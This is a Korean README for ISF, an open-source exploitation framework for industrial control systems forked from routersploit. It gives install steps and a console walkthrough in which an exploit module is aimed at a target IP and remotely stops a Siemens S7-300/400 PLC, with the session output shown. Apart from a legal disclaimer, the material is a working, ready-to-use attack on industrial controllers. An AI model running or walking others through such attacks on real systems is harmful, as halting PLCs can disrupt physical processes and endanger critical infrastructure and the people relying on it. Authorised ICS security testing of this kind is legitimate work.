산업용 익스플로잇 프레임워크
ISF(Industrial Exploitation Framework)는 Python 기반의 익스플로잇 프레임워크로, metasploit 프레임워크와 유사합니다.
ISF는 오픈 소스 프로젝트인 routersploit을 기반으로 합니다.
다른 언어로 읽기: English, 简体中文,
면책 조항
ISF를 사전 상호 동의 없이 대상 공격에 사용하는 것은 불법입니다. 모든 관련 지역, 주 및 연방 법률을 준수하는 것은 최종 사용자의 책임입니다. 개발자는 어떠한 책임도 지지 않으며, 이 프로그램으로 인한 오용이나 손해에 대해 책임을 지지 않습니다.
ICS 프로토콜 클라이언트
| 이름 | 경로 | 설명 |
|---|
| modbus_tcp_client | icssploit/clients/modbus_tcp_client.py | Modbus-TCP 클라이언트 |
| wdb2_client | icssploit/clients/wdb2_client.py | WdbRPC 버전 2 클라이언트(Vxworks 6.x) |
| s7_client | icssploit/clients/s7_client.py | S7comm 클라이언트(S7 300/400 PLC) |
익스플로잇 모듈
스캐너 모듈
ICS 프로토콜 모듈 (Scapy 모듈)
이 프로토콜들은 Kitty와 같은 다른 퍼징 프레임워크에서 사용하거나 자체 클라이언트를 만드는 데 사용할 수 있습니다.
설치
Python 요구 사항
Kali에 설치
git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py
사용법
root@kali:~/Desktop/temp/isf# python isf.py
_____ _____ _____ _____ _____ _ ____ _____ _______
|_ _/ ____|/ ____/ ____| __ \| | / __ \_ _|__ __|
| || | | (___| (___ | |__) | | | | | || | | |
| || | \___ \\___ \| ___/| | | | | || | | |
_| || |____ ____) |___) | | | |___| |__| || |_ | |
|_____\_____|_____/_____/|_| |______\____/_____| |_|
ICS 익스플로잇 프레임워크
참고 : ICSSPOLIT는 routersploit에서 포크되었습니다.
https://github.com/reverse-shell/routersploit
개발 팀 : wenzhe zhu(dark-lbp)
버전 : 0.1.0
익스플로잇: 2 스캐너: 0 자격증명: 13
ICS 익스플로잇:
PLC: 2 ICS 스위치: 0
소프트웨어: 0
isf >
익스플로잇
isf > use exploits/plcs/
exploits/plcs/siemens/ exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >
탭 키를 사용하여 자동 완성할 수 있습니다.
옵션
모듈 옵션 표시:
isf (S7-300/400 PLC Control) > show options
대상 옵션:
이름 현재 설정 설명
---- ---------------- -----------
target 대상 주소 예: 192.168.1.1
port 102 대상 포트
모듈 옵션:
이름 현재 설정 설명
---- ---------------- -----------
slot 2 CPU 슬롯 번호.
command 1 명령 0:PLC 시작, 1:PLC 중지.
isf (S7-300/400 PLC Control) >
옵션 설정
isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}
모듈 실행
isf (S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >
익스플로잇 정보 표시
isf (S7-300/400 PLC Control) > show info
이름:
S7-300/400 PLC Control
설명:
S7comm 명령을 사용하여 PLC를 시작/중지합니다.
장치:
- 지멘스 S7-300 및 S7-400 프로그래밍 가능 논리 컨트롤러(PLC)
저자:
- wenzhe zhu <jtrkid[at]gmail.com>
참고 자료:
isf (S7-300/400 PLC Control) >
문서